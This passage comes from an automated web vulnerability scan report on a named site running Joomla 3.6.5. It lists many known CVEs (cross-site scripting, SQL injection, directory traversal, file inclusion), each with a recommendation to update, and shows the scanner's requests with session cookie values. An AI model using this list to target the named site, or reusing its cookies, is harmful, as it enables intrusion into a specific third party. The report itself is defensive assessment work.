User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (1.5.0 - 3.7.3)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.5.0 and up to and including 3.7.3 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.7.4 or latest

References

https://developer.joomla.org/security-centre/701-20170704-core-installer-lack-of-ownership-verification
(https://developer.joomla.org/security-centre/701-20170704-core-installer-lack-of-ownership-verification)

CVE-2017-11612 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11612)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.7.3 are affected.


Request headers

139
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (1.5.0 - 3.8.3)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.5.0 and up to and including 3.8.3 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.4 or latest

References

https://lorexxar.cn/2018/02/07/joomla3-8-4/ (https://lorexxar.cn/2018/02/07/joomla3-8-4/)

https://developer.joomla.org/security-centre/721-20180104-core-xss-vulnerability.html
(https://developer.joomla.org/security-centre/721-20180104-core-xss-vulnerability.html)

CVE-2018-6379 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6379)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.8.3 are affected.


Request headers

140
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (1.6.0 - 3.8.8)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.6.0 and up to and including 3.8.8 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.9 or latest

References

https://developer.joomla.org/security-centre/740-20180602-core-xss-vulnerability-in-language-switcher-module
(https://developer.joomla.org/security-centre/740-20180602-core-xss-vulnerability-in-language-switcher-module)

CVE-2018-12711 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12711)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.6.0 and 3.8.8 are affected.


Request headers

141
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (1.7.0 - 3.9.5)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 1.7.0 and up to and including 3.9.5 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.6 or latest

References

https://developer.joomla.org/security-centre/780-20190501-core-xss-in-com-users-acl-debug-view.html
(https://developer.joomla.org/security-centre/780-20190501-core-xss-in-com-users-acl-debug-view.html)

CVE-2019-11809 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11809)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.7.0 and 3.9.5 are affected.


Request headers

142
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (2.5.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 2.5.0 and up to and including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/843-20210303-core-xss-within-alert-messages-showed-to-users.html
(https://developer.joomla.org/security-centre/843-20210303-core-xss-within-alert-messages-showed-to-users.html)

CVE-2021-23129 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23129)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.24 are affected.


Request headers

143
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Cross-Site Scripting (2.5.0 - 3.9.24)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An
attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of
the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! Core versions ranging from 2.5.0 and up to and including 3.9.24 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.25 or latest

References

https://developer.joomla.org/security-centre/844-20210304-core-xss-within-the-feed-parser-library.html
(https://developer.joomla.org/security-centre/844-20210304-core-xss-within-the-feed-parser-library.html)

CVE-2021-23130 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23130)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.24 are affected.


Request headers

144
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Denial of Service (2.5.0 - 3.9.27)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a Denial of Service vulnerability. Exploiting this issue may allow an attacker to cause a broken
usergroups table, thus denying service to legitimate users. Joomla! Core versions ranging from 2.5.0 and up to and
including 3.9.27 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.28 or latest

References

https://developer.joomla.org/security-centre/857-20210702-core-dos-through-usergroup-table-manipulation.html
(https://developer.joomla.org/security-centre/857-20210702-core-dos-through-usergroup-table-manipulation.html)

CVE-2021-26036 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26036)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.27 are affected.


Request headers

145
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Directory Traversal (1.5.0 - 3.9.4)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 1.5.0 and up to and including 3.9.4 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.5 or latest

References

https://www.exploit-db.com/exploits/46710 (https://www.exploit-db.com/exploits/46710)

https://packetstormsecurity.com/files/152515/Joomla-3.9.4-Arbitrary-File-Deletion-Directory-Traversal.html
(https://packetstormsecurity.com/files/152515/Joomla-3.9.4-Arbitrary-File-Deletion-Directory-Traversal.html)

https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media.html
(https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media.html)

CVE-2019-10945 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.9.4 are affected.


Request headers

146
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Directory Traversal (2.5.0 - 3.9.20)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.9.20 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.21 or latest

References

https://github.com/HoangKien1020/CVE-2020-24597 (https://github.com/HoangKien1020/CVE-2020-24597)

https://developer.joomla.org/security-centre/827-20200803-core-directory-traversal-in-com-media.html
(https://developer.joomla.org/security-centre/827-20200803-core-directory-traversal-in-com-media.html)

CVE-2020-24597 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24597)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.20 are affected.


Request headers

147
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Directory Traversal (2.5.0 - 3.9.22)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a directory traversal vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.9.22 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.23 or latest

References

https://developer.joomla.org/security-centre/830-20201103-core-path-traversal-in-mod-random-image.html
(https://developer.joomla.org/security-centre/830-20201103-core-path-traversal-in-mod-random-image.html)

CVE-2020-35612 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35612)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.22 are affected.


Request headers

148
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Information Disclosure (1.5.0 - 3.7.5)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.5.0 and up to and including
3.7.5 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.0 or latest

References

https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
(https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/)

https://developer.joomla.org/security-centre/711-20170902-core-ldap-information-disclosure
(https://developer.joomla.org/security-centre/711-20170902-core-ldap-information-disclosure)

CVE-2017-14596 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14596)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.7.5 are affected.


Request headers

149
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Information Disclosure (1.5.0 - 3.8.1)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.5.0 and up to and including
3.8.1 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.2 or latest

References

https://developer.joomla.org/security-centre/714-20171101-core-ldap-information-disclosure.html
(https://developer.joomla.org/security-centre/714-20171101-core-ldap-information-disclosure.html)

CVE-2017-14596 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14596)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.8.1 are affected.


Request headers

150
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Information Disclosure (2.5.0 - 3.9.22)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 2.5.0 and up to and including
3.9.22 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.23 or latest

References

https://developer.joomla.org/security-centre/829-20201102-core-disclosure-of-secrets-in-global-configuration-page.html
(https://developer.joomla.org/security-centre/829-20201102-core-disclosure-of-secrets-in-global-configuration-page.html)

CVE-2020-35611 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35611)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.22 are affected.


Request headers

151
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Information Disclosure (2.5.0 - 3.9.22)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 2.5.0 and up to and including
3.9.22 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.23 or latest

References

https://developer.joomla.org/security-centre/828-20201101-core-com-finder-ignores-access-levels-on-autosuggest.html
(https://developer.joomla.org/security-centre/828-20201101-core-com-finder-ignores-access-levels-on-autosuggest.html)

CVE-2020-35610 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35610)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.22 are affected.


Request headers

152
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Local File Inclusion (2.5.0 - 3.8.8)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. Joomla! Core
versions ranging from 2.5.0 and up to and including 3.8.8 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.9 or latest

References

https://developer.joomla.org/security-centre/741-20180601-core-local-file-inclusion-with-php-5-3
(https://developer.joomla.org/security-centre/741-20180601-core-local-file-inclusion-with-php-5-3)

CVE-2018-12712 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12712)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.8.8 are affected.


Request headers

153
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Cross-Site Scripting Vulnerabilities (1.5.0 - 3.8.7)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions ranging from 1.5.0 and up to and including 3.8.7 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.8.8 or latest

References

https://developer.joomla.org/security-centre/737-20180509-core-xss-vulnerability-in-the-media-manager.html
(https://developer.joomla.org/security-centre/737-20180509-core-xss-vulnerability-in-the-media-manager.html)

CVE-2018-6378 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6378)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 1.5.0 and 3.8.7 are affected.


Request headers

154
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Cross-Site Scripting Vulnerabilities (2.5.0 - 3.9.1)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the
context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other
attacks. Joomla! Core versions ranging from 2.5.0 and up to and including 3.9.1 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.2 or latest

References

https://www.exploit-db.com/exploits/46200 (https://www.exploit-db.com/exploits/46200)

https://packetstormsecurity.com/files/151234/Joomla-3.9.1-Cross-Site-Scripting.html
(https://packetstormsecurity.com/files/151234/Joomla-3.9.1-Cross-Site-Scripting.html)

https://developer.joomla.org/security-centre/760-20190101-core-stored-xss-in-mod-banners
(https://developer.joomla.org/security-centre/760-20190101-core-stored-xss-in-mod-banners)

https://developer.joomla.org/security-centre/761-20190102-core-stored-xss-in-com-contact.html
(https://developer.joomla.org/security-centre/761-20190102-core-stored-xss-in-com-contact.html)

https://developer.joomla.org/security-centre/762-20190103-core-stored-xss-issue-in-the-global-configuration-textfilter-
settings.html (https://developer.joomla.org/security-centre/762-20190103-core-stored-xss-issue-in-the-global-configuration-
textfilter-settings.html)

https://developer.joomla.org/security-centre/763-20190104-core-stored-xss-issue-in-the-global-configuration-help-url.html
(https://developer.joomla.org/security-centre/763-20190104-core-stored-xss-issue-in-the-global-configuration-help-url.html)

CVE-2019-6261 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6261)

CVE-2019-6262 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6262)

CVE-2019-6263 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6263)

CVE-2019-6264 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6264)

Affected items

155
Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.1 are affected.


Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple SQL Injection Vulnerabilities (2.5.0 - 3.9.13)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple SQL injection vulnerabilities because it fails to sufficiently sanitize user-supplied data
before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database. Joomla! Core versions ranging from 2.5.0 and up to
and including 3.9.13 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.9.14 or latest

References

https://developer.joomla.org/security-centre/797-20191202-core-various-sql-injections-through-configuration-
parameters.html (https://developer.joomla.org/security-centre/797-20191202-core-various-sql-injections-through-
configuration-parameters.html)

CVE-2019-19846 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19846)

Affected items

Web Server
Details
Current Joomla! version: 3.6.5.

Joomla! versions between 2.5.0 and 3.9.13 are affected.

156
Request headers
GET / HTTP/1.1

Cookie: a308237e2ec6210cea8fcf73eca7b3a9=6t72lqejgnjva7t3okn6fqkp83;
5da9d1543b7fc48f4ec8750837c87201=uumr7rne6armjsfitdsvus73m4

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: www.sogbci.com

Connection: Keep-alive


Joomla! Core Multiple Vulnerabilities (1.5.0 - 3.7.2)

Severity High
Reported by module /Scripts/WebApps/joomla_8.script

Description

Joomla! Core is prone to multiple vulnerabilities, including cross-site scripting and information disclosure vulnerabilities.
Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in
the context of the affected site, allowing the attacker to steal cookie-based authentication credentials, or to obtain sensitive
information that may help in launching further attacks. Joomla! Core versions ranging from 1.5.0 and up to and including
3.7.2 are vulnerable.

Impact

Recommendation

Update to Joomla! Core version 3.7.3 or latest

References

http://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered
(http://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered)

https://developer.joomla.org/security-centre/683-core-information-disclosure.html (https://developer.joomla.org/security-
centre/683-core-information-disclosure.html)

